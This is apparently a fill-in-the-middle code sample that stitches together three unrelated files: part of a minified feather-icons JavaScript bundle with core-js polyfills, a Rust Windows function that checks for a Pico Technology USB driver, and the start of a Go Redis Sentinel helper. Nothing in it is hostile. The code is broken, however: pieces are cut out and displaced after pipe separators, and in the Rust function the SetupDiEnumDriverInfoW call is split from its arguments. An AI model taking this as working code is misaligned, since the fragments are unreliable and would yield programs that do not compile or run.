shield: '<path d="M12 22s8-4 8-10V5l-8-3-8 3v7c0 6 8 10 8 10z"></path>',
"shopping-bag": '<path d="M6 2L3 6v14a2 2 0 0 0 2 2h14a2 2 0 0 0 2-2V6l-3-4z"></path><line x1="3" y1="6" x2="21" y2="6"></line><path d="M16 10a4 4 0 0 1-8 0"></path>',
"shopping-cart": '<circle cx="9" cy="21" r="1"></circle><circle cx="20" cy="21" r="1"></circle><path d="M1 1h4l2.68 13.39a2 2 0 0 0 2 1.61h9.72a2 2 0 0 0 2-1.61L23 6H6"></path>',
shuffle: '<polyline points="16 3 21 3 21 8"></polyline><line x1="4" y1="20" x2="21" y2="3"></line><polyline points="21 16 21 21 16 21"></polyline><line x1="15" y1="15" x2="21" y2="21"></line><line x1="4" y1="4" x2="9" y2="9"></line>',
sidebar: '<rect x="3" y="3" width="18" height="18" rx="2" ry="2"></rect><line x1="9" y1="3" x2="9" y2="21"></line>',
"skip-back": '<polygon points="19 20 9 12 19 4 19 20"></polygon><line x1="5" y1="19" x2="5" y2="5"></line>',
"skip-forward": '<polygon points="5 4 15 12 5 20 5 4"></polygon><line x1="19" y1="5" x2="19" y2="19"></line>',
slack: '<path d="M14.5 10c-.83 0-1.5-.67-1.5-1.5v-5c0-.83.67-1.5 1.5-1.5s1.5.67 1.5 1.5v5c0 .83-.67 1.5-1.5 1.5z"></path><path d="M20.5 10H19V8.5c0-.83.67-1.5 1.5-1.5s1.5.67 1.5 1.5-.67 1.5-1.5 1.5z"></path><path d="M9.5 14c.83 0 1.5.67 1.5 1.5v5c0 .83-.67 1.5-1.5 1.5S8 21.33 8 20.5v-5c0-.83.67-1.5 1.5-1.5z"></path><path d="M3.5 14H5v1.5c0 .83-.67 1.5-1.5 1.5S2 16.33 2 15.5 2.67 14 3.5 14z"></path><path d="M14 14.5c0-.83.67-1.5 1.5-1.5h5c.83 0 1.5.67 1.5 1.5s-.67 1.5-1.5 1.5h-5c-.83 0-1.5-.67-1.5-1.5z"></path><path d="M15.5 19H14v1.5c0 .83.67 1.5 1.5 1.5s1.5-.67 1.5-1.5-.67-1.5-1.5-1.5z"></path><path d="M10 9.5C10 8.67 9.33 8 8.5 8h-5C2.67 8 2 8.67 2 9.5S2.67 11 3.5 11h5c.83 0 1.5-.67 1.5-1.5z"></path><path d="M8.5 5H10V3.5C10 2.67 9.33 2 8.5 2S7 2.67 7 3.5 7.67 5 8.5 5z"></path>',
slash: '<circle cx="12" cy="12" r="10"></circle><line x1="4.93" y1="4.93" x2="19.07" y2="19.07"></line>',
sliders: '<line x1="4" y1="21" x2="4" y2="14"></line><line x1="4" y1="10" x2="4" y2="3"></line><line x1="12" y1="21" x2="12" y2="12"></line><line x1="12" y1="8" x2="12" y2="3"></line><line x1="20" y1="21" x2="20" y2="16"></line><line x1="20" y1="12" x2="20" y2="3"></line><line x1="1" y1="14" x2="7" y2="14"></line><line x1="9" y1="8" x2="15" y2="8"></line><line x1="17" y1="16" x2="23" y2="16"></line>',
smartphone: '<rect x="5" y="2" width="14" height="20" rx="2" ry="2"></rect><line x1="12" y1="18" x2="12.01" y2="18"></line>',
smile: '<circle cx="12" cy="12" r="10"></circle><path d="M8 14s1.5 2 4 2 4-2 4-2"></path><line x1="9" y1="9" x2="9.01" y2="9"></line><line x1="15" y1="9" x2="15.01" y2="9"></line>',
speaker: '<rect x="4" y="2" width="16" height="20" rx="2" ry="2"></rect><circle cx="12" cy="14" r="4"></circle><line x1="12" y1="6" x2="12.01" y2="6"></line>',
square: '<rect x="3" y="3" width="18" height="18" rx="2" ry="2"></rect>',
star: '<polygon points="12 2 15.09 8.26 22 9.27 17 14.14 18.18 21.02 12 17.77 5.82 21.02 7 14.14 2 9.27 8.91 8.26 12 2"></polygon>',
"stop-circle": '<circle cx="12" cy="12" r="10"></circle><rect x="9" y="9" width="6" height="6"></rect>',
sun: '<circle cx="12" cy="12" r="5"></circle><line x1="12" y1="1" x2="12" y2="3"></line><line x1="12" y1="21" x2="12" y2="23"></line><line x1="4.22" y1="4.22" x2="5.64" y2="5.64"></line><line x1="18.36" y1="18.36" x2="19.78" y2="19.78"></line><line x1="1" y1="12" x2="3" y2="12"></line><line x1="21" y1="12" x2="23" y2="12"></line><line x1="4.22" y1="19.78" x2="5.64" y2="18.36"></line><line x1="18.36" y1="5.64" x2="19.78" y2="4.22"></line>',
sunrise: '<path d="M17 18a5 5 0 0 0-10 0"></path><line x1="12" y1="2" x2="12" y2="9"></line><line x1="4.22" y1="10.22" x2="5.64" y2="11.64"></line><line x1="1" y1="18" x2="3" y2="18"></line><line x1="21" y1="18" x2="23" y2="18"></line><line x1="18.36" y1="11.64" x2="19.78" y2="10.22"></line><line x1="23" y1="22" x2="1" y2="22"></line><polyline points="8 6 12 2 16 6"></polyline>',
sunset: '<path d="M17 18a5 5 0 0 0-10 0"></path><line x1="12" y1="9" x2="12" y2="2"></line><line x1="4.22" y1="10.22" x2="5.64" y2="11.64"></line><line x1="1" y1="18" x2="3" y2="18"></line><line x1="21" y1="18" x2="23" y2="18"></line><line x1="18.36" y1="11.64" x2="19.78" y2="10.22"></line><line x1="23" y1="22" x2="1" y2="22"></line><polyline points="16 5 12 9 8 5"></polyline>',
tablet: '<rect x="4" y="2" width="16" height="20" rx="2" ry="2"></rect><line x1="12" y1="18" x2="12.01" y2="18"></line>',
tag: '<path d="M20.59 13.41l-7.17 7.17a2 2 0 0 1-2.83 0L2 12V2h10l8.59 8.59a2 2 0 0 1 0 2.82z"></path><line x1="7" y1="7" x2="7.01" y2="7"></line>',
target: '<circle cx="12" cy="12" r="10"></circle><circle cx="12" cy="12" r="6"></circle><circle cx="12" cy="12" r="2"></circle>',
terminal: '<polyline points="4 17 10 11 4 5"></polyline><line x1="12" y1="19" x2="20" y2="19"></line>',
thermometer: '<path d="M14 14.76V3.5a2.5 2.5 0 0 0-5 0v11.26a4.5 4.5 0 1 0 5 0z"></path>',
"thumbs-down": '<path d="M10 15v4a3 3 0 0 0 3 3l4-9V2H5.72a2 2 0 0 0-2 1.7l-1.38 9a2 2 0 0 0 2 2.3zm7-13h2.67A2.31 2.31 0 0 1 22 4v7a2.31 2.31 0 0 1-2.33 2H17"></path>',
"thumbs-up": '<path d="M14 9V5a3 3 0 0 0-3-3l-4 9v11h11.28a2 2 0 0 0 2-1.7l1.38-9a2 2 0 0 0-2-2.3zM7 22H4a2 2 0 0 1-2-2v-7a2 2 0 0 1 2-2h3"></path>',
"toggle-left": '<rect x="1" y="5" width="22" height="14" rx="7" ry="7"></rect><circle cx="8" cy="12" r="3"></circle>',
"toggle-right": '<rect x="1" y="5" width="22" height="14" rx="7" ry="7"></rect><circle cx="16" cy="12" r="3"></circle>',
tool: '<path d="M14.7 6.3a1 1 0 0 0 0 1.4l1.6 1.6a1 1 0 0 0 1.4 0l3.77-3.77a6 6 0 0 1-7.94 7.94l-6.91 6.91a2.12 2.12 0 0 1-3-3l6.91-6.91a6 6 0 0 1 7.94-7.94l-3.76 3.76z"></path>',
"trash-2": '<polyline points="3 6 5 6 21 6"></polyline><path d="M19 6v14a2 2 0 0 1-2 2H7a2 2 0 0 1-2-2V6m3 0V4a2 2 0 0 1 2-2h4a2 2 0 0 1 2 2v2"></path><line x1="10" y1="11" x2="10" y2="17"></line><line x1="14" y1="11" x2="14" y2="17"></line>',
trash: '<polyline points="3 6 5 6 21 6"></polyline><path d="M19 6v14a2 2 0 0 1-2 2H7a2 2 0 0 1-2-2V6m3 0V4a2 2 0 0 1 2-2h4a2 2 0 0 1 2 2v2"></path>',
trello: '<rect x="3" y="3" width="18" height="18" rx="2" ry="2"></rect><rect x="7" y="7" width="3" height="9"></rect><rect x="14" y="7" width="3" height="5"></rect>',
"trending-down": '<polyline points="23 18 13.5 8.5 8.5 13.5 1 6"></polyline><polyline points="17 18 23 18 23 12"></polyline>',
"trending-up": '<polyline points="23 6 13.5 15.5 8.5 10.5 1 18"></polyline><polyline points="17 6 23 6 23 12"></polyline>',
triangle: '<path d="M10.29 3.86L1.82 18a2 2 0 0 0 1.71 3h16.94a2 2 0 0 0 1.71-3L13.71 3.86a2 2 0 0 0-3.42 0z"></path>',
truck: '<rect x="1" y="3" width="15" height="13"></rect><polygon points="16 8 20 8 23 11 23 16 16 16 16 8"></polygon><circle cx="5.5" cy="18.5" r="2.5"></circle><circle cx="18.5" cy="18.5" r="2.5"></circle>',
tv: '<rect x="2" y="7" width="20" height="15" rx="2" ry="2"></rect><polyline points="17 2 12 7 7 2"></polyline>',
twitch: '<path d="M21 2H3v16h5v4l4-4h5l4-4V2zm-10 9V7m5 4V7"></path>',
twitter: '<path d="M23 3a10.9 10.9 0 0 1-3.14 1.53 4.48 4.48 0 0 0-7.86 3v1A10.66 10.66 0 0 1 3 4s-4 9 5 13a11.64 11.64 0 0 1-7 2c9 5 20 0 20-11.5a4.5 4.5 0 0 0-.08-.83A7.72 7.72 0 0 0 23 3z"></path>',
type: '<polyline points="4 7 4 4 20 4 20 7"></polyline><line x1="9" y1="20" x2="15" y2="20"></line><line x1="12" y1="4" x2="12" y2="20"></line>',
umbrella: '<path d="M23 12a11.05 11.05 0 0 0-22 0zm-5 7a3 3 0 0 1-6 0v-7"></path>',
underline: '<path d="M6 3v7a6 6 0 0 0 6 6 6 6 0 0 0 6-6V3"></path><line x1="4" y1="21" x2="20" y2="21"></line>',
unlock: '<rect x="3" y="11" width="18" height="11" rx="2" ry="2"></rect><path d="M7 11V7a5 5 0 0 1 9.9-1"></path>',
"upload-cloud": '<polyline points="16 16 12 12 8 16"></polyline><line x1="12" y1="12" x2="12" y2="21"></line><path d="M20.39 18.39A5 5 0 0 0 18 9h-1.26A8 8 0 1 0 3 16.3"></path><polyline points="16 16 12 12 8 16"></polyline>',
upload: '<path d="M21 15v4a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-4"></path><polyline points="17 8 12 3 7 8"></polyline><line x1="12" y1="3" x2="12" y2="15"></line>',
"user-check": '<path d="M16 21v-2a4 4 0 0 0-4-4H5a4 4 0 0 0-4 4v2"></path><circle cx="8.5" cy="7" r="4"></circle><polyline points="17 11 19 13 23 9"></polyline>',
"user-minus": '<path d="M16 21v-2a4 4 0 0 0-4-4H5a4 4 0 0 0-4 4v2"></path><circle cx="8.5" cy="7" r="4"></circle><line x1="23" y1="11" x2="17" y2="11"></line>',
"user-plus": '<path d="M16 21v-2a4 4 0 0 0-4-4H5a4 4 0 0 0-4 4v2"></path><circle cx="8.5" cy="7" r="4"></circle><line x1="20" y1="8" x2="20" y2="14"></line><line x1="23" y1="11" x2="17" y2="11"></line>',
"user-x": '<path d="M16 21v-2a4 4 0 0 0-4-4H5a4 4 0 0 0-4 4v2"></path><circle cx="8.5" cy="7" r="4"></circle><line x1="18" y1="8" x2="23" y2="13"></line><line x1="23" y1="8" x2="18" y2="13"></line>',
user: '<path d="M20 21v-2a4 4 0 0 0-4-4H8a4 4 0 0 0-4 4v2"></path><circle cx="12" cy="7" r="4"></circle>',
users: '<path d="M17 21v-2a4 4 0 0 0-4-4H5a4 4 0 0 0-4 4v2"></path><circle cx="9" cy="7" r="4"></circle><path d="M23 21v-2a4 4 0 0 0-3-3.87"></path><path d="M16 3.13a4 4 0 0 1 0 7.75"></path>',
"video-off": '<path d="M16 16v1a2 2 0 0 1-2 2H3a2 2 0 0 1-2-2V7a2 2 0 0 1 2-2h2m5.66 0H14a2 2 0 0 1 2 2v3.34l1 1L23 7v10"></path><line x1="1" y1="1" x2="23" y2="23"></line>',
video: '<polygon points="23 7 16 12 23 17 23 7"></polygon><rect x="1" y="5" width="15" height="14" rx="2" ry="2"></rect>',
voicemail: '<circle cx="5.5" cy="11.5" r="4.5"></circle><circle cx="18.5" cy="11.5" r="4.5"></circle><line x1="5.5" y1="16" x2="18.5" y2="16"></line>',
"volume-1": '<polygon points="11 5 6 9 2 9 2 15 6 15 11 19 11 5"></polygon><path d="M15.54 8.46a5 5 0 0 1 0 7.07"></path>',
"volume-2": '<polygon points="11 5 6 9 2 9 2 15 6 15 11 19 11 5"></polygon><path d="M19.07 4.93a10 10 0 0 1 0 14.14M15.54 8.46a5 5 0 0 1 0 7.07"></path>',
"volume-x": '<polygon points="11 5 6 9 2 9 2 15 6 15 11 19 11 5"></polygon><line x1="23" y1="9" x2="17" y2="15"></line><line x1="17" y1="9" x2="23" y2="15"></line>',
volume: '<polygon points="11 5 6 9 2 9 2 15 6 15 11 19 11 5"></polygon>',
watch: '<circle cx="12" cy="12" r="7"></circle><polyline points="12 9 12 12 13.5 13.5"></polyline><path d="M16.51 17.35l-.35 3.83a2 2 0 0 1-2 1.82H9.83a2 2 0 0 1-2-1.82l-.35-3.83m.01-10.7l.35-3.83A2 2 0 0 1 9.83 1h4.35a2 2 0 0 1 2 1.82l.35 3.83"></path>',
"wifi-off": '<line x1="1" y1="1" x2="23" y2="23"></line><path d="M16.72 11.06A10.94 10.94 0 0 1 19 12.55"></path><path d="M5 12.55a10.94 10.94 0 0 1 5.17-2.39"></path><path d="M10.71 5.05A16 16 0 0 1 22.58 9"></path><path d="M1.42 9a15.91 15.91 0 0 1 4.7-2.88"></path><path d="M8.53 16.11a6 6 0 0 1 6.95 0"></path><line x1="12" y1="20" x2="12.01" y2="20"></line>',
wifi: '<path d="M5 12.55a11 11 0 0 1 14.08 0"></path><path d="M1.42 9a16 16 0 0 1 21.16 0"></path><path d="M8.53 16.11a6 6 0 0 1 6.95 0"></path><line x1="12" y1="20" x2="12.01" y2="20"></line>',
wind: '<path d="M9.59 4.59A2 2 0 1 1 11 8H2m10.59 11.41A2 2 0 1 0 14 16H2m15.73-8.27A2.5 2.5 0 1 1 19.5 12H2"></path>',
"x-circle": '<circle cx="12" cy="12" r="10"></circle><line x1="15" y1="9" x2="9" y2="15"></line><line x1="9" y1="9" x2="15" y2="15"></line>',
"x-octagon": '<polygon points="7.86 2 16.14 2 22 7.86 22 16.14 16.14 22 7.86 22 2 16.14 2 7.86 7.86 2"></polygon><line x1="15" y1="9" x2="9" y2="15"></line><line x1="9" y1="9" x2="15" y2="15"></line>',
"x-square": '<rect x="3" y="3" width="18" height="18" rx="2" ry="2"></rect><line x1="9" y1="9" x2="15" y2="15"></line><line x1="15" y1="9" x2="9" y2="15"></line>',
x: '<line x1="18" y1="6" x2="6" y2="18"></line><line x1="6" y1="6" x2="18" y2="18"></line>',
youtube: '<path d="M22.54 6.42a2.78 2.78 0 0 0-1.94-2C18.88 4 12 4 12 4s-6.88 0-8.6.46a2.78 2.78 0 0 0-1.94 2A29 29 0 0 0 1 11.75a29 29 0 0 0 .46 5.33A2.78 2.78 0 0 0 3.4 19c1.72.46 8.6.46 8.6.46s6.88 0 8.6-.46a2.78 2.78 0 0 0 1.94-2 29 29 0 0 0 .46-5.25 29 29 0 0 0-.46-5.33z"></path><polygon points="9.75 15.02 15.5 11.75 9.75 8.48 9.75 15.02"></polygon>',
"zap-off": '<polyline points="12.41 6.75 13 2 10.57 4.92"></polyline><polyline points="18.57 12.91 21 10 15.66 10"></polyline><polyline points="8 8 3 14 12 14 11 22 16 16"></polyline><line x1="1" y1="1" x2="23" y2="23"></line>',
zap: '<polygon points="13 2 3 14 12 14 11 22 21 10 12 10 13 2"></polygon>',
"zoom-in": '<circle cx="11" cy="11" r="8"></circle><line x1="21" y1="21" x2="16.65" y2="16.65"></line><line x1="11" y1="8" x2="11" y2="14"></line><line x1="8" y1="11" x2="14" y2="11"></line>',
"zoom-out": '<circle cx="11" cy="11" r="8"></circle><line x1="21" y1="21" x2="16.65" y2="16.65"></line><line x1="8" y1="11" x2="14" y2="11"></line>'
}
}, function (e) {
    // Bundled module: default SVG attributes shared by every feather icon —
    // 24x24 viewBox, no fill, 2px round-capped/joined stroke in currentColor.
    e.exports = {
        xmlns: "http://www.w3.org/2000/svg",
        width: 24,
        height: 24,
        viewBox: "0 0 24 24",
        fill: "none",
        stroke: "currentColor",
        "stroke-width": 2,
        "stroke-linecap": "round",
        "stroke-linejoin": "round"
    }
}, function (e, n, i) {
"use strict";
Object.defineProperty(n, "__esModule", {
value: !0
});
var t = Object.assign || function (e) {
for (var n = 1; n < arguments.length; n++) {
var i = arguments[n];
for (var t in i) Object.prototype.hasOwnProperty.call(i, t) && (e[t] = i[t])
}
return e
},
l = function () {
function e(e, n) {
for (var i = 0; i < n.length; i++) {
var t = n[i];
t.enumerable = t.enumerable || !1, t.configurable = !0, "value" in t && (t.writable = !0), Object.defineProperty(e, t.key, t)
}
}
return function (n, i, t) {
return i && e(n.prototype, i), t && e(n, t), n
}
}(),
r = a(i(22)),
o = a(i(42));
function a(e) {
return e && e.__esModule ? e : {
default: e
}
}
var c = function () {
function e(n, i) {
var l = arguments.length > 2 && void 0 !== arguments[2] ? arguments[2] : [];
! function (e, n) {
if (!(e instanceof n)) throw new TypeError("Cannot call a class as a function")
}(this, e), this.name = n, this.contents = i, this.tags = l, this.attrs = t({}, o.default, {
class: "feather feather-" + n
})
}
return l(e, [{
key: "toSvg",
value: function () {
var e = arguments.length > 0 && void 0 !== arguments[0] ? arguments[0] : {};
return "<svg " + function (e) {
return Object.keys(e).map(function (n) {
return n + '="' + e[n] + '"'
}).join(" ")
}(t({}, this.attrs, e, {
class: (0, r.default)(this.attrs.class, e.class)
})) + ">" + this.contents + "</svg>"
}
}, {
key: "toString",
value: function () {
return this.contents
}
}]), e
}();
n.default = c
}, function (e, n, i) {
"use strict";
var t = o(i(12)),
l = o(i(39)),
r = o(i(38));
function o(e) {
return e && e.__esModule ? e : {
default: e
}
}
e.exports = {
icons: t.default,
toSvg: l.default,
replace: r.default
}
}, function (e, n, i) {
e.exports = i(0)
}, function (e, n, i) {
var t = i(2)("iterator"),
l = !1;
try {
var r = 0,
o = {
next: function () {
return {
done: !!r++
}
},
return: function () {
l = !0
}
};
o[t] = function () {
return this
}, Array.from(o, function () {
throw 2
})
} catch (e) {}
e.exports = function (e, n) {
if (!n && !l) return !1;
var i = !1;
try {
var r = {};
r[t] = function () {
return {
next: function () {
return {
done: i = !0
}
}
}
}, e(r)
} catch (e) {}
return i
}
}, function (e, n, i) {
var t = i(30),
l = i(2)("toStringTag"),
r = "Arguments" == t(function () {
return arguments
}());
e.exports = function (e) {
var n, i, o;
return void 0 === e ? "Undefined" : null === e ? "Null" : "string" == typeof (i = function (e, n) {
try {
return e[n]
} catch (e) {}
}(n = Object(e), l)) ? i : r ? t(n) : "Object" == (o = t(n)) && "function" == typeof n.callee ? "Arguments" : o
}
}, function (e, n, i) {
var t = i(47),
l = i(9),
r = i(2)("iterator");
e.exports = function (e) {
if (void 0 != e) return e[r] || e["@@iterator"] || l[t(e)]
}
}, function (e, n, i) {
"use strict";
var t = i(18),
l = i(7),
r = i(10);
e.exports = function (e, n, i) {
var o = t(n);
o in e ? l.f(e, o, r(0, i)) : e[o] = i
}
}, function (e, n, i) {
var t = i(2),
l = i(9),
r = t("iterator"),
o = Array.prototype;
e.exports = function (e) {
return void 0 !== e && (l.Array === e || o[r] === e)
}
}, function (e, n, i) {
var t = i(3);
e.exports = function (e, n, i, l) {
try {
return l ? n(t(i)[0], i[1]) : n(i)
} catch (n) {
var r = e.return;
throw void 0 !== r && t(r.call(e)), n
}
}
}, function (e, n) {
e.exports = function (e) {
if ("function" != typeof e) throw TypeError(String(e) + " is not a function");
return e
}
}, function (e, n, i) {
var t = i(52);
e.exports = function (e, n, i) {
if (t(e), void 0 === n) return e;
switch (i) {
case 0:
return function () {
return e.call(n)
};
case 1:
return function (i) {
return e.call(n, i)
};
case 2:
return function (i, t) {
return e.call(n, i, t)
};
case 3:
return function (i, t, l) {
return e.call(n, i, t, l)
}
}
return function () {
return e.apply(n, arguments)
}
}
}, function (e, n, i) {
"use strict";
var t = i(53),
l = i(24),
r = i(51),
o = i(50),
a = i(27),
c = i(49),
p = i(48);
e.exports = function (e) {
var n, i, y, h, x = l(e),
s = "function" == typeof this ? this : Array,
u = arguments.length,
d = u > 1 ? arguments[1] : void 0,
f = void 0 !== d,
g = 0,
v = p(x);
if (f && (d = t(d, u > 2 ? arguments[2] : void 0, 2)), void 0 == v || s == Array && o(v))
for (i = new s(n = a(x.length)); n > g; g++) c(i, g, f ? d(x[g], g) : x[g]);
else
for (h = v.call(x), i = new s; !(y = h.next()).done; g++) c(i, g, f ? r(h, d, [y.value, g], !0) : y.value);
return i.length = g, i
}
}, function (e, n, i) {
var t = i(32),
l = i(54);
t({
target: "Array",
stat: !0,
forced: !i(46)(function (e) {
Array.from(e)
})
}, {
from: l
})
}, function (e, n, i) {
var t = i(6),
l = i(3);
e.exports = function (e, n) {
if (l(e), !t(n) && null !== n) throw TypeError("Can't set " + String(n) + " as a prototype")
}
}, function (e, n, i) {
var t = i(56);
e.exports = Object.setPrototypeOf || ("__proto__" in {} ? function () {
var e, n = !1,
i = {};
try {
(e = Object.getOwnPropertyDescriptor(Object.prototype, "__proto__").set).call(i, []), n = i instanceof Array
} catch (e) {}
return function (i, l) {
return t(i, l), n ? e.call(i, l) : i.__proto__ = l, i
}
}() : void 0)
}, function (e, n, i) {
var t = i(0).document;
e.exports = t && t.documentElement
}, function (e, n, i) {
var t = i(28),
l = i(13);
e.exports = Object.keys || function (e) {
return t(e, l)
}
}, function (e, n, i) { | r = i(3),
o = i(59);
e.exports = t ? Object.defineProperties : function (e, n) {
r(e);
for (var i, t = o(n), a = t.length, c = 0; a > c;) l.f(e, i = t[c++], n[i]);
return e
}
}, function (e, n, i) {
var t = i(3),
l = i(60),
r = i(13),
o = i(15),
a = i(58),
c = i(34),
p = i(16)("IE_PROTO"),
y = function () {},
h = function () {
var e, n = c("iframe"),
i = r.length;
for (n.style.display = "none", a.appendChild(n), n.src = String("javascript:"), (e = n.contentWindow.document).open(), e.write("<script>document.F=Object<\/script>"), e.close(), h = e.F; i--;) delete h.prototype[r[i]];
return h()
};
e.exports = Object.create || function (e, n) {
var i;
return null !== e ? (y.prototype = t(e), i = new y, y.prototype = null, i[p] = e) : i = h(), void 0 === n ? i : l(i, n)
}, o[p] = !0
}, function (e, n, i) {
var t = i(4);
e.exports = !!Object.getOwnPropertySymbols && !t(function () {
return !String(Symbol())
})
}, function (e, n, i) {
var t = i(4);
e.exports = !t(function () {
function e() {}
return e.prototype.constructor = null, Object.getPrototypeOf(new e) !== e.prototype
})
}, function (e, n, i) {
"use strict";
var t = i(26).IteratorPrototype,
l = i(61),
r = i(10),
o = i(23),
a = i(9),
c = function () {
return this
};
e.exports = function (e, n, i) {
var p = n + " Iterator";
return e.prototype = l(t, {
next: r(1, i)
}), o(e, p, !1, !0), a[p] = c, e
}
}, function (e, n, i) {
var t = i(4),
l = /#|\.prototype\./,
r = function (e, n) {
var i = a[o(e)];
return i == p || i != c && ("function" == typeof n ? t(n) : !!n)
},
o = r.normalize = function (e) {
return String(e).replace(l, ".").toLowerCase()
},
a = r.data = {},
c = r.NATIVE = "N",
p = r.POLYFILL = "P";
e.exports = r
}, function (e, n) {
n.f = Object.getOwnPropertySymbols
}, function (e, n, i) {
var t = i(21),
l = Math.max,
r = Math.min;
e.exports = function (e, n) {
var i = t(e);
return i < 0 ? l(i + n, 0) : r(i, n)
}
}, function (e, n, i) {
var t = i(14),
l = i(27),
r = i(67);
e.exports = function (e) {
return function (n, i, o) {
var a, c = t(n),
p = l(c.length),
y = r(o, p);
if (e && i != i) {
for (; p > y;)
if ((a = c[y++]) != a) return !0
} else
for (; p > y; y++)
if ((e || y in c) && c[y] === i) return e || y || 0;
return !e && -1
}
}
}, function (e, n, i) {
var t = i(28),
l = i(13).concat("length", "prototype");
n.f = Object.getOwnPropertyNames || function (e) {
return t(e, l)
}
}, function (e, n, i) {
var t = i(0),
l = i(69),
r = i(66),
o = i(3),
a = t.Reflect;
e.exports = a && a.ownKeys || function (e) {
var n = l.f(o(e)),
i = r.f;
return i ? n.concat(i(e)) : n
}
}, function (e, n, i) {
var t = i(1),
l = i(70),
r = i(31),
o = i(7);
e.exports = function (e, n) {
for (var i = l(n), a = o.f, c = r.f, p = 0; p < i.length; p++) {
var y = i[p];
t(e, y) || a(e, y, c(n, y))
}
}
}, function (e, n, i) {
var t = i(4),
l = i(30),
r = "".split;
e.exports = t(function () {
return !Object("z").propertyIsEnumerable(0)
}) ? function (e) {
return "String" == l(e) ? r.call(e, "") : Object(e)
} : Object
}, function (e, n, i) {
"use strict";
var t = {}.propertyIsEnumerable,
l = Object.getOwnPropertyDescriptor,
r = l && !t.call({
1: 2
}, 1);
n.f = r ? function (e) {
var n = l(this, e);
return !!n && n.enumerable
} : t
}, function (e, n, i) {
"use strict";
var t = i(32),
l = i(64),
r = i(25),
o = i(57),
a = i(23),
c = i(5),
p = i(29),
y = i(2),
h = i(17),
x = i(9),
s = i(26),
u = s.IteratorPrototype,
d = s.BUGGY_SAFARI_ITERATORS,
f = y("iterator"),
g = function () {
return this
};
e.exports = function (e, n, i, y, s, v, m) {
l(i, n, y);
var w, M, b, z = function (e) {
if (e === s && O) return O;
if (!d && e in H) return H[e];
switch (e) {
case "keys":
case "values":
case "entries":
return function () {
return new i(this, e)
}
}
return function () {
return new i(this)
}
},
A = n + " Iterator",
k = !1,
H = e.prototype,
V = H[f] || H["@@iterator"] || s && H[s],
O = !d && V || z(s),
j = "Array" == n && H.entries || V;
if (j && (w = r(j.call(new e)), u !== Object.prototype && w.next && (h || r(w) === u || (o ? o(w, u) : "function" != typeof w[f] && c(w, f, g)), a(w, A, !0, !0), h && (x[A] = g))), "values" == s && V && "values" !== V.name && (k = !0, O = function () {
return V.call(this)
}), h && !m || H[f] === O || c(H, f, O), x[n] = O, s)
if (M = {
values: z("values"),
keys: v ? O : z("keys"),
entries: z("entries")
}, m)
for (b in M) !d && !k && b in H || p(H, b, M[b]);
else t({
target: n,
proto: !0,
forced: d || k
}, M);
return M
}
}, function (e, n) {
var i;
i = function () {
return this
}();
try {
i = i || Function("return this")() || (0, eval)("this")
} catch (e) {
"object" == typeof window && (i = window)
}
e.exports = i
}, function (e, n, i) {
var t = i(0),
l = i(36),
r = t.WeakMap;
e.exports = "function" == typeof r && /native code/.test(l.call(r))
}, function (e, n, i) {
var t = i(21),
l = i(20);
e.exports = function (e, n, i) {
var r, o, a = String(l(e)),
c = t(n),
p = a.length;
return c < 0 || c >= p ? i ? "" : void 0 : (r = a.charCodeAt(c)) < 55296 || r > 56319 || c + 1 === p || (o = a.charCodeAt(c + 1)) < 56320 || o > 57343 ? i ? a.charAt(c) : r : i ? a.slice(c, c + 2) : o - 56320 + (r - 55296 << 10) + 65536
}
}, function (e, n, i) {
"use strict";
var t = i(77),
l = i(37),
r = i(74),
o = l.set,
a = l.getterFor("String Iterator");
r(String, "String", function (e) {
o(this, {
type: "String Iterator",
string: String(e),
index: 0
})
}, function () {
var e, n = a(this),
i = n.string,
l = n.index;
return l >= i.length ? {
value: void 0,
done: !0
} : (e = t(i, l, !0), n.index += e.length, {
value: e,
done: !1
})
})
}, function (e, n, i) {
i(78), i(55);
var t = i(45);
e.exports = t.Array.from
}, function (e, n, i) {
i(79), e.exports = i(44)
}])
}); | var t = i(8),
l = i(7), |
kernel_driver.rs | #[cfg(not(target_os = "windows"))]
pub fn is_missing() -> bool {
false
}
#[cfg(target_os = "windows")]
pub fn is_missing() -> bool {
use std::{
ffi::OsStr,
iter::once,
mem::size_of,
os::windows::ffi::OsStrExt,
ptr::{null, null_mut},
};
use winapi::um::setupapi::*;
let flags = DIGCF_ALLCLASSES;
let wide: Vec<u16> = OsStr::new("USB").encode_wide().chain(once(0)).collect();
let dev_info = unsafe { SetupDiGetClassDevsW(null(), wide.as_ptr(), null_mut(), flags) };
let mut dev_info_data = SP_DEVINFO_DATA {
cbSize: size_of::<SP_DEVINFO_DATA>() as u32,
..Default::default()
};
let mut i = 0;
while unsafe { SetupDiEnumDeviceInfo(dev_info, i, &mut dev_info_data) } > 0 {
if unsafe { SetupDiBuildDriverInfoList(dev_info, &mut dev_info_data, SPDIT_COMPATDRIVER) }
> 0
{
let mut j = 0;
loop {
let mut drv_info_data = SP_DRVINFO_DATA_V2_W {
cbSize: std::mem::size_of::<SP_DRVINFO_DATA_V2_W>() as u32,
..Default::default()
};
| dev_info,
&mut dev_info_data,
SPDIT_COMPATDRIVER,
j,
&mut drv_info_data,
)
} == 0
{
break;
}
let mfg = drv_info_data.MfgName;
if String::from_utf16_lossy(&mfg)
.trim_matches(char::from(0))
.contains("Pico Technology Ltd")
{
return false;
}
j += 1;
}
}
i += 1;
}
true
} | if unsafe {
SetupDiEnumDriverInfoW(
|
sentinel.go | // Copyright 2016 CodisLabs. All Rights Reserved.
// Licensed under the MIT (MIT-LICENSE.txt) license.
package redis
import (
"fmt"
"net"
"strconv"
"strings"
"time"
"golang.org/x/net/context"
"github.com/CodisLabs/codis/pkg/utils/errors"
"github.com/CodisLabs/codis/pkg/utils/sync2/atomic2"
redigo "github.com/garyburd/redigo/redis"
)
type Sentinel struct {
context.Context
Cancel context.CancelFunc
Product, Auth string
LogFunc func(format string, args ...interface{})
ErrFunc func(err error, format string, args ...interface{})
}
func NewSentinel(product, auth string) *Sentinel |
func (s *Sentinel) IsCanceled() bool {
select {
case <-s.Context.Done():
return true
default:
return false
}
}
func (s *Sentinel) NodeName(gid int) string {
return fmt.Sprintf("%s-%d", s.Product, gid)
}
func (s *Sentinel) isSameProduct(name string) (gid int, _ bool) {
if !strings.HasPrefix(name, s.Product) {
return 0, false
}
var suffix = name[len(s.Product):]
if len(suffix) <= 1 || suffix[0] != '-' {
return 0, false
}
n, err := strconv.Atoi(suffix[1:])
if err != nil {
return 0, false
}
return n, true
}
func (s *Sentinel) printf(format string, args ...interface{}) {
if s.LogFunc != nil {
s.LogFunc(format, args...)
}
}
